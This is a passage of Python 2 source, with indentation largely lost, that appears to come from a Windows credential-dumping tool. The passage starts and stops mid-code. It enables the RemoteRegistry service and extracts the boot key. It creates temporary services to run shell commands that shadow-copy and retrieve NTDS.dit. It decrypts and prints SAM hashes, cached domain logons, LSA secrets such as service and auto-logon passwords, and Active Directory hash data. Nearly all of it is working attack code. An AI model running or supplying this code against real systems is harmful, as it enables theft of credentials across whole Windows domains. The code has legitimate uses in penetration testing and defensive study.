self.__smbConnection.closeFile(self.__tid, self.__fid)
self.__smbConnection.deleteFile('ADMIN$', self.__fileName)
self.__fid = None
def tell(self):
return self.__currentOffset
def __str__(self):
return "\\\\%s\\ADMIN$\\%s" % (self.__smbConnection.getRemoteHost(), self.__fileName)
class RemoteOperations:
def __init__(self, smbConnection):
self.__smbConnection = smbConnection
self.__smbConnection.setTimeout(5*60)
self.__serviceName = 'RemoteRegistry'
self.__stringBindingWinReg = r'ncacn_np:445[\pipe\winreg]'
self.__stringBindingSvcCtl = r'ncacn_np:445[\pipe\svcctl]'
self.__rrp = None
self.__bootKey = ''
self.__disabled = False
self.__shouldStop = False
self.__started = False
self.__scmr = None
self.__regHandle = None
self.__batchFile = '%TEMP%\\execute.bat'
self.__shell = '%COMSPEC% /Q /c '
self.__output = '%SYSTEMROOT%\\Temp\\__output'
self.__answerTMP = ''
self.__tmpServiceName = None
self.__serviceDeleted = False
def __connectSvcCtl(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)
rpc.set_smb_connection(self.__smbConnection)
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
def __connectWinReg(self):
rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)
rpc.set_smb_connection(self.__smbConnection)
self.__rrp = rpc.get_dce_rpc()
self.__rrp.connect()
self.__rrp.bind(rrp.MSRPC_UUID_RRP)
def getMachineNameAndDomain(self):
if self.__smbConnection.getServerName() == '':
# No serverName.. this is either because we're doing Kerberos
# or not receiving that data during the login process.
# Let's try getting it through RPC
rpc = transport.DCERPCTransportFactory(r'ncacn_np:445[\pipe\wkssvc]')
rpc.set_smb_connection(self.__smbConnection)
dce = rpc.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
resp = wkst.hNetrWkstaGetInfo(dce, 100)
dce.disconnect()
return resp['WkstaInfo']['WkstaInfo100']['wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100']['wki100_langroup'][:-1]
else:
return self.__smbConnection.getServerName(), self.__smbConnection.getServerDomain()
def getDefaultLoginAccount(self):
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon')
keyHandle = ans['phkResult']
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName')
username = dataValue[:-1]
            dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultDomainName')
domain = dataValue[:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
if len(domain) > 0:
return '%s\\%s' % (domain,username)
else:
return username
except Exception, e:
return None
def getServiceAccount(self, serviceName):
try:
# Open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, serviceName)
serviceHandle = ans['lpServiceHandle']
resp = scmr.hRQueryServiceConfigW(self.__scmr, serviceHandle)
account = resp['lpServiceConfig']['lpServiceStartName'][:-1]
scmr.hRCloseServiceHandle(self.__scmr, serviceHandle)
if account.startswith('.\\'):
account = account[2:]
return account
except Exception, e:
logging.error(e)
return None
def __checkServiceStatus(self):
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)
self.__serviceHandle = ans['lpServiceHandle']
# Let's check its status
ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)
if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
logging.info('Service %s is in stopped state'% self.__serviceName)
self.__shouldStop = True
self.__started = False
elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
logging.debug('Service %s is already running'% self.__serviceName)
self.__shouldStop = False
self.__started = True
else:
            raise Exception('Unknown service state 0x%x - Aborting' % ans['lpServiceStatus']['dwCurrentState'])
# Let's check its configuration if service is stopped, maybe it's disabled :s
if self.__started == False:
ans = scmr.hRQueryServiceConfigW(self.__scmr,self.__serviceHandle)
if ans['lpServiceConfig']['dwStartType'] == 0x4:
logging.info('Service %s is disabled, enabling it'% self.__serviceName)
self.__disabled = True
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x3)
logging.info('Starting service %s' % self.__serviceName)
scmr.hRStartServiceW(self.__scmr,self.__serviceHandle)
time.sleep(1)
def enableRegistry(self):
self.__connectSvcCtl()
self.__checkServiceStatus()
self.__connectWinReg()
def __restore(self):
# First of all stop the service if it was originally stopped
if self.__shouldStop is True:
logging.info('Stopping service %s' % self.__serviceName)
scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
if self.__disabled is True:
logging.info('Restoring the disabled state for service %s' % self.__serviceName)
scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType = 0x4)
if self.__serviceDeleted is False:
# Check again the service we created does not exist, starting a new connection
# Why?.. Hitting CTRL+C might break the whole existing DCE connection
try:
rpc = transport.DCERPCTransportFactory(r'ncacn_np:%s[\pipe\svcctl]' % self.__smbConnection.getRemoteHost())
if hasattr(rpc, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpc.set_credentials(*self.__smbConnection.getCredentials())
self.__scmr = rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
# Open SC Manager
ans = scmr.hROpenSCManagerW(self.__scmr)
self.__scManagerHandle = ans['lpScHandle']
# Now let's open the service
                resp = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName)
                service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, self.__serviceHandle)
scmr.hRCloseServiceHandle(self.__scmr, self.__scManagerHandle)
rpc.disconnect()
except Exception, e:
# If service is stopped it'll trigger an exception
# If service does not exist it'll trigger an exception
# So. we just wanna be sure we delete it, no need to
# show this exception message
pass
def finish(self):
self.__restore()
self.__rrp.disconnect()
self.__scmr.disconnect()
def getBootKey(self):
bootKey = ''
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa\\%s' % key)
keyHandle = ans['phkResult']
ans = rrp.hBaseRegQueryInfoKey(self.__rrp,keyHandle)
bootKey = bootKey + ans['lpClassOut'][:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
bootKey = bootKey.decode('hex')
for i in xrange(len(bootKey)):
self.__bootKey += bootKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % self.__bootKey.encode('hex'))
return self.__bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
try:
dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
except:
noLMHash = 0
if noLMHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def __retrieveHive(self, hiveName):
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
except:
raise Exception("Can't open %s hive" % hiveName)
keyHandle = ans['phkResult']
resp = rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
# Now let's open the remote file, so it can be read later
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
return remoteFileName
def saveSAM(self):
logging.debug('Saving remote SAM database')
return self.__retrieveHive('SAM')
def saveSECURITY(self):
logging.debug('Saving remote SECURITY database')
return self.__retrieveHive('SECURITY')
def __executeRemote(self, data):
self.__tmpServiceName = ''.join([random.choice(string.letters) for i in range(8)]).encode('utf-16le')
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
command += ' & ' + 'del ' + self.__batchFile
self.__serviceDeleted = False
resp = scmr.hRCreateServiceW(self.__scmr, self.__scManagerHandle, self.__tmpServiceName, self.__tmpServiceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
self.__serviceDeleted = True
scmr.hRCloseServiceHandle(self.__scmr, service)
def __answer(self, data):
self.__answerTMP += data
def __getLastVSS(self):
self.__executeRemote('%COMSPEC% /C vssadmin list shadows')
time.sleep(5)
tries = 0
while True:
try:
self.__smbConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
break
except Exception, e:
if tries > 30:
# We give up
raise Exception('Too many tries trying to list vss shadows')
if str(e).find('SHARING') > 0:
# Stuff didn't finish yet.. wait more
time.sleep(5)
tries +=1
pass
else:
raise
lines = self.__answerTMP.split('\n')
lastShadow = ''
lastShadowFor = ''
# Let's find the last one
# The string used to search the shadow for drive. Wondering what happens
# in other languages
SHADOWFOR = 'Volume: ('
for line in lines:
if line.find('GLOBALROOT') > 0:
lastShadow = line[line.find('\\\\?'):][:-1]
elif line.find(SHADOWFOR) > 0:
lastShadowFor = line[line.find(SHADOWFOR)+len(SHADOWFOR):][:2]
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
return lastShadow, lastShadowFor
def saveNTDS(self):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % (ntdsLocation))
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join([random.choice(string.letters) for i in range(8)]) + '.tmp'
self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
return remoteFileName
class CryptoCommon:
# Common crypto stuff used over different classes
def transformKey(self, InputKey):
# Section 2.2.11.1.2 Encrypting a 64-Bit Block with a 7-Byte Key
OutputKey = []
OutputKey.append( chr(ord(InputKey[0]) >> 0x01) )
OutputKey.append( chr(((ord(InputKey[0])&0x01)<<6) | (ord(InputKey[1])>>2)) )
OutputKey.append( chr(((ord(InputKey[1])&0x03)<<5) | (ord(InputKey[2])>>3)) )
OutputKey.append( chr(((ord(InputKey[2])&0x07)<<4) | (ord(InputKey[3])>>4)) )
OutputKey.append( chr(((ord(InputKey[3])&0x0F)<<3) | (ord(InputKey[4])>>5)) )
OutputKey.append( chr(((ord(InputKey[4])&0x1F)<<2) | (ord(InputKey[5])>>6)) )
OutputKey.append( chr(((ord(InputKey[5])&0x3F)<<1) | (ord(InputKey[6])>>7)) )
OutputKey.append( chr(ord(InputKey[6]) & 0x7F) )
for i in range(8):
OutputKey[i] = chr((ord(OutputKey[i]) << 1) & 0xfe)
return "".join(OutputKey)
def deriveKey(self, baseKey):
# 2.2.11.1.3 Deriving Key1 and Key2 from a Little-Endian, Unsigned Integer Key
# Let I be the little-endian, unsigned integer.
# Let I[X] be the Xth byte of I, where I is interpreted as a zero-base-index array of bytes.
# Note that because I is in little-endian byte order, I[0] is the least significant byte.
# Key1 is a concatenation of the following values: I[0], I[1], I[2], I[3], I[0], I[1], I[2].
# Key2 is a concatenation of the following values: I[3], I[0], I[1], I[2], I[3], I[0], I[1]
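        # Worked example (derived from the rules above): for baseKey 0x01020304,
        # pack('<L') yields the bytes 04 03 02 01, so before transformKey()'s
        # parity-bit expansion:
        #   Key1 = 04 03 02 01 04 03 02
        #   Key2 = 01 04 03 02 01 04 03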
key = pack('<L',baseKey)
key1 = key[0] + key[1] + key[2] + key[3] + key[0] + key[1] + key[2]
key2 = key[3] + key[0] + key[1] + key[2] + key[3] + key[0] + key[1]
return self.transformKey(key1),self.transformKey(key2)
class OfflineRegistry:
def __init__(self, hiveFile = None, isRemote = False):
self.__hiveFile = hiveFile
if self.__hiveFile is not None:
self.__registryHive = winregistry.Registry(self.__hiveFile, isRemote)
def enumKey(self, searchKey):
parentKey = self.__registryHive.findKey(searchKey)
if parentKey is None:
return
keys = self.__registryHive.enumKey(parentKey)
return keys
def enumValues(self, searchKey):
key = self.__registryHive.findKey(searchKey)
if key is None:
return
values = self.__registryHive.enumValues(key)
return values
def getValue(self, keyValue):
value = self.__registryHive.getValue(keyValue)
if value is None:
return
return value
def getClass(self, className):
value = self.__registryHive.getClass(className)
if value is None:
return
return value
def finish(self):
if self.__hiveFile is not None:
# Remove temp file and whatever else is needed
self.__registryHive.close()
class SAMHashes(OfflineRegistry):
def __init__(self, samFile, bootKey, isRemote = False):
OfflineRegistry.__init__(self, samFile, isRemote)
self.__samFile = samFile
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__cryptoCommon = CryptoCommon()
self.__itemsFound = {}
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def getHBootKey(self):
logging.debug('Calculating HashedBootKey from SAM')
QWERTY = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
DIGITS = "0123456789012345678901234567890123456789\0"
        F = self.getValue(ntpath.join('SAM\\Domains\\Account','F'))[1]
domainData = DOMAIN_ACCOUNT_F(F)
rc4Key = self.MD5(domainData['Key0']['Salt'] + QWERTY + self.__bootKey + DIGITS)
rc4 = ARC4.new(rc4Key)
self.__hashedBootKey = rc4.encrypt(domainData['Key0']['Key']+domainData['Key0']['CheckSum'])
# Verify key with checksum
checkSum = self.MD5( self.__hashedBootKey[:16] + DIGITS + self.__hashedBootKey[:16] + QWERTY)
if checkSum != self.__hashedBootKey[16:]:
raise Exception('hashedBootKey CheckSum failed, Syskey startup password probably in use! :(')
def __decryptHash(self, rid, cryptedHash, constant):
# Section 2.2.11.1.1 Encrypting an NT or LM Hash Value with a Specified Key
# plus hashedBootKey stuff
Key1,Key2 = self.__cryptoCommon.deriveKey(rid)
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
rc4Key = self.MD5( self.__hashedBootKey[:0x10] + pack("<L",rid) + constant )
rc4 = ARC4.new(rc4Key)
key = rc4.encrypt(cryptedHash)
decryptedHash = Crypt1.decrypt(key[:8]) + Crypt2.decrypt(key[8:])
return decryptedHash
def dump(self):
NTPASSWORD = "NTPASSWORD\0"
LMPASSWORD = "LMPASSWORD\0"
if self.__samFile is None:
# No SAM file provided
return
logging.info('Dumping local SAM hashes (uid:rid:lmhash:nthash)')
self.getHBootKey()
usersKey = 'SAM\\Domains\\Account\\Users'
# Enumerate all the RIDs
rids = self.enumKey(usersKey)
# Remove the Names item
try:
rids.remove('Names')
except:
pass
for rid in rids:
userAccount = USER_ACCOUNT_V(self.getValue(ntpath.join(usersKey,rid,'V'))[1])
rid = int(rid,16)
baseOffset = len(USER_ACCOUNT_V())
V = userAccount['Data']
userName = V[userAccount['NameOffset']:userAccount['NameOffset']+userAccount['NameLength']].decode('utf-16le')
if userAccount['LMHashLength'] == 20:
encLMHash = V[userAccount['LMHashOffset']+4:userAccount['LMHashOffset']+userAccount['LMHashLength']]
else:
encLMHash = ''
if userAccount['NTHashLength'] == 20:
encNTHash = V[userAccount['NTHashOffset']+4:userAccount['NTHashOffset']+userAccount['NTHashLength']]
else:
encNTHash = ''
lmHash = self.__decryptHash(rid, encLMHash, LMPASSWORD)
ntHash = self.__decryptHash(rid, encNTHash, NTPASSWORD)
if lmHash == '':
lmHash = ntlm.LMOWFv1('','')
if ntHash == '':
ntHash = ntlm.NTOWFv1('','')
answer = "%s:%d:%s:%s:::" % (userName, rid, lmHash.encode('hex'), ntHash.encode('hex'))
self.__itemsFound[rid] = answer
print answer
def export(self, fileName):
if len(self.__itemsFound) > 0:
items = sorted(self.__itemsFound)
fd = open(fileName+'.sam','w+')
for item in items:
fd.write(self.__itemsFound[item]+'\n')
fd.close()
class LSASecrets(OfflineRegistry):
def __init__(self, securityFile, bootKey, remoteOps = None, isRemote = False):
OfflineRegistry.__init__(self,securityFile, isRemote)
self.__hashedBootKey = ''
self.__bootKey = bootKey
self.__LSAKey = ''
self.__NKLMKey = ''
self.__isRemote = isRemote
self.__vistaStyle = True
self.__cryptoCommon = CryptoCommon()
self.__securityFile = securityFile
self.__remoteOps = remoteOps
self.__cachedItems = []
self.__secretItems = []
def MD5(self, data):
md5 = hashlib.new('md5')
md5.update(data)
return md5.digest()
def __sha256(self, key, value, rounds=1000):
sha = hashlib.sha256()
sha.update(key)
        for i in range(rounds):
sha.update(value)
return sha.digest()
def __decryptAES(self, key, value, iv='\x00'*16):
plainText = ''
if iv != '\x00'*16:
aes256 = AES.new(key,AES.MODE_CBC, iv)
for index in range(0, len(value), 16):
if iv == '\x00'*16:
aes256 = AES.new(key,AES.MODE_CBC, iv)
cipherBuffer = value[index:index+16]
# Pad buffer to 16 bytes
if len(cipherBuffer) < 16:
cipherBuffer += '\x00' * (16-len(cipherBuffer))
plainText += aes256.decrypt(cipherBuffer)
return plainText
def __decryptSecret(self, key, value):
# [MS-LSAD] Section 5.1.2
plainText = ''
encryptedSecretSize = unpack('<I', value[:4])[0]
value = value[len(value)-encryptedSecretSize:]
key0 = key
for i in range(0, len(value), 8):
cipherText = value[:8]
tmpStrKey = key0[:7]
tmpKey = self.__cryptoCommon.transformKey(tmpStrKey)
Crypt1 = DES.new(tmpKey, DES.MODE_ECB)
plainText += Crypt1.decrypt(cipherText)
cipherText = cipherText[8:]
key0 = key0[7:]
value = value[8:]
# AdvanceKey
if len(key0) < 7:
key0 = key[len(key0):]
secret = LSA_SECRET_XP(plainText)
return (secret['Secret'])
def __decryptHash(self, key, value, iv):
hmac_md5 = HMAC.new(key,iv)
rc4key = hmac_md5.digest()
rc4 = ARC4.new(rc4key)
data = rc4.encrypt(value)
return data
def __decryptLSA(self, value):
if self.__vistaStyle is True:
            # ToDo: there could be more than one LSA key
record = LSA_SECRET(value)
tmpKey = self.__sha256(self.__bootKey, record['EncryptedData'][:32])
plainText = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
record = LSA_SECRET_BLOB(plainText)
self.__LSAKey = record['Secret'][52:][:32]
else:
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(value[60:76])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.decrypt(value[12:60])
self.__LSAKey = plainText[0x10:0x20]
def __getLSASecretKey(self):
logging.debug('Decrypting LSA Key')
# Let's try the key post XP
value = self.getValue('\\Policy\\PolEKList\\default')
if value is None:
logging.debug('PolEKList not found, trying PolSecretEncryptionKey')
# Second chance
value = self.getValue('\\Policy\\PolSecretEncryptionKey\\default')
self.__vistaStyle = False
if value is None:
# No way :(
return None
self.__decryptLSA(value[1])
def __getNLKMSecret(self):
logging.debug('Decrypting NL$KM')
value = self.getValue('\\Policy\\Secrets\\NL$KM\\CurrVal\\default')
if value is None:
raise Exception("Couldn't get NL$KM value")
if self.__vistaStyle is True:
record = LSA_SECRET(value[1])
tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
self.__NKLMKey = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
else:
self.__NKLMKey = self.__decryptSecret(self.__LSAKey, value[1])
def __pad(self, data):
if (data & 0x3) > 0:
return data + (data & 0x3)
else:
return data
def dumpCachedHashes(self):
if self.__securityFile is None:
# No SECURITY file provided
return
logging.info('Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)')
# Let's first see if there are cached entries
values = self.enumValues('\\Cache')
        if values is None:
# No cache entries
return
try:
            # Remove unnecessary value
values.remove('NL$Control')
except:
pass
self.__getLSASecretKey()
self.__getNLKMSecret()
for value in values:
logging.debug('Looking into %s' % value)
record = NL_RECORD(self.getValue(ntpath.join('\\Cache',value))[1])
if record['CH'] != 16 * '\x00':
if self.__vistaStyle is True:
plainText = self.__decryptAES(self.__NKLMKey[16:32], record['EncryptedData'], record['CH'])
else:
plainText = self.__decryptHash(self.__NKLMKey, record['EncryptedData'], record['CH'])
pass
encHash = plainText[:0x10]
plainText = plainText[0x48:]
userName = plainText[:record['UserLength']].decode('utf-16le')
plainText = plainText[self.__pad(record['UserLength']):]
domain = plainText[:record['DomainNameLength']].decode('utf-16le')
plainText = plainText[self.__pad(record['DomainNameLength']):]
domainLong = plainText[:self.__pad(record['FullDomainLength'])].decode('utf-16le')
answer = "%s:%s:%s:%s:::" % (userName, encHash.encode('hex'), domainLong, domain)
self.__cachedItems.append(answer)
print answer
def __printSecret(self, name, secretItem):
# Based on [MS-LSAD] section 3.1.1.4
# First off, let's discard NULL secrets.
if len(secretItem) == 0:
logging.debug('Discarding secret %s, NULL Data' % name)
return
        # We might have secrets that are all zeros
if secretItem.startswith('\x00\x00'):
logging.debug('Discarding secret %s, all zeros' % name)
return
upperName = name.upper()
logging.info('%s ' % name)
secret = ''
if upperName.startswith('_SC_'):
# Service name, a password might be there
# Let's first try to decode the secret
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
# We have to get the account the service
# runs under
if self.__isRemote is True:
account = self.__remoteOps.getServiceAccount(name[4:])
if account is None:
secret = '(Unknown User):'
else:
secret = "%s:" % account
else:
# We don't support getting this info for local targets at the moment
secret = '(Unknown User):'
secret += strDecoded
elif upperName.startswith('DEFAULTPASSWORD'):
# defaults password for winlogon
# Let's first try to decode the secret
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
# We have to get the account this password is for
if self.__isRemote is True:
account = self.__remoteOps.getDefaultLoginAccount()
if account is None:
secret = '(Unknown User):'
else:
secret = "%s:" % account
else:
# We don't support getting this info for local targets at the moment
secret = '(Unknown User):'
secret += strDecoded
elif upperName.startswith('ASPNET_WP_PASSWORD'):
try:
strDecoded = secretItem.decode('utf-16le')
except:
pass
else:
secret = 'ASPNET: %s' % strDecoded
elif upperName.startswith('$MACHINE.ACC'):
# compute MD4 of the secret.. yes.. that is the nthash? :-o
md4 = MD4.new()
md4.update(secretItem)
if self.__isRemote is True:
machine, domain = self.__remoteOps.getMachineNameAndDomain()
secret = "%s\\%s$:%s:%s:::" % (domain, machine, ntlm.LMOWFv1('','').encode('hex'), md4.digest().encode('hex'))
else:
secret = "$MACHINE.ACC: %s:%s" % (ntlm.LMOWFv1('','').encode('hex'), md4.digest().encode('hex'))
if secret != '':
print secret
self.__secretItems.append(secret)
else:
# Default print, hexdump
self.__secretItems.append('%s:%s' % (name, secretItem.encode('hex')))
hexdump(secretItem)
def dumpSecrets(self):
if self.__securityFile is None:
# No SECURITY file provided
return
logging.info('Dumping LSA Secrets')
# Let's first see if there are cached entries
keys = self.enumKey('\\Policy\\Secrets')
        if keys is None:
# No entries
return
try:
            # Remove unnecessary value
keys.remove('NL$Control')
except:
pass
if self.__LSAKey == '':
self.__getLSASecretKey()
for key in keys:
logging.debug('Looking into %s' % key)
value = self.getValue('\\Policy\\Secrets\\%s\\CurrVal\\default' % key)
if value is not None:
if self.__vistaStyle is True:
record = LSA_SECRET(value[1])
tmpKey = self.__sha256(self.__LSAKey, record['EncryptedData'][:32])
plainText = self.__decryptAES(tmpKey, record['EncryptedData'][32:])
record = LSA_SECRET_BLOB(plainText)
secret = record['Secret']
else:
secret = self.__decryptSecret(self.__LSAKey, value[1])
self.__printSecret(key, secret)
def exportSecrets(self, fileName):
if len(self.__secretItems) > 0:
fd = open(fileName+'.secrets','w+')
for item in self.__secretItems:
fd.write(item+'\n')
fd.close()
def exportCached(self, fileName):
if len(self.__cachedItems) > 0:
fd = open(fileName+'.cached','w+')
for item in self.__cachedItems:
fd.write(item+'\n')
fd.close()
class NTDSHashes():
NAME_TO_INTERNAL = {
'uSNCreated':'ATTq131091',
'uSNChanged':'ATTq131192',
'name':'ATTm3',
'objectGUID':'ATTk589826',
'objectSid':'ATTr589970',
'userAccountControl':'ATTj589832',
'primaryGroupID':'ATTj589922',
'accountExpires':'ATTq589983',
'logonCount':'ATTj589993',
'sAMAccountName':'ATTm590045',
'sAMAccountType':'ATTj590126',
'lastLogonTimestamp':'ATTq589876',
'userPrincipalName':'ATTm590480',
'unicodePwd':'ATTk589914',
'dBCSPwd':'ATTk589879',
'ntPwdHistory':'ATTk589918',
'lmPwdHistory':'ATTk589984',
'pekList':'ATTk590689',
'supplementalCredentials':'ATTk589949',
}
KERBEROS_TYPE = {
1:'dec-cbc-crc',
3:'des-cbc-md5',
17:'aes128-cts-hmac-sha1-96',
18:'aes256-cts-hmac-sha1-96',
0xffffff74:'rc4_hmac',
}
INTERNAL_TO_NAME = dict((v,k) for k,v in NAME_TO_INTERNAL.iteritems())
SAM_NORMAL_USER_ACCOUNT = 0x30000000
SAM_MACHINE_ACCOUNT = 0x30000001
SAM_TRUST_ACCOUNT = 0x30000002
ACCOUNT_TYPES = ( SAM_NORMAL_USER_ACCOUNT, SAM_MACHINE_ACCOUNT, SAM_TRUST_ACCOUNT)
class PEK_KEY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedPek','52s=""'),
)
class CRYPTED_HASH(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash','16s=""'),
)
class CRYPTED_HISTORY(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
class CRYPTED_BLOB(Structure):
structure = (
('Header','8s=""'),
('KeyMaterial','16s=""'),
('EncryptedHash',':'),
)
def __init__(self, ntdsFile, bootKey, isRemote = False, history = False, noLMHash = True):
self.__bootKey = bootKey
self.__NTDS = ntdsFile
self.__history = history
self.__noLMHash = noLMHash
if self.__NTDS is not None:
self.__ESEDB = ESENT_DB(ntdsFile, isRemote = isRemote)
self.__cursor = self.__ESEDB.openTable('datatable')
self.__tmpUsers = list()
self.__PEK = None
self.__cryptoCommon = CryptoCommon()
self.__hashesFound = {}
self.__kerberosKeys = collections.OrderedDict()
def __getPek(self):
logging.info('Searching for pekList, be patient')
pek = None
while True:
record = self.__ESEDB.getNextRow(self.__cursor)
if record is None:
break
elif record[self.NAME_TO_INTERNAL['pekList']] is not None:
pek = record[self.NAME_TO_INTERNAL['pekList']].decode('hex')
break
elif record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
# Okey.. we found some users, but we're not yet ready to process them.
# Let's just store them in a temp list
self.__tmpUsers.append(record)
if pek is not None:
encryptedPek = self.PEK_KEY(pek)
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(encryptedPek['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(encryptedPek['EncryptedPek'])
self.__PEK = plainText[36:]
def __removeRC4Layer(self, cryptedHash):
md5 = hashlib.new('md5')
md5.update(self.__PEK)
md5.update(cryptedHash['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(cryptedHash['EncryptedHash'])
return plainText
def __removeDESLayer(self, cryptedHash, rid):
Key1,Key2 = self.__cryptoCommon.deriveKey(int(rid))
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
decryptedHash = Crypt1.decrypt(cryptedHash[:8]) + Crypt2.decrypt(cryptedHash[8:])
return decryptedHash
def __decryptSupplementalInfo(self, record):
# This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
if len(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex')) > 24:
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
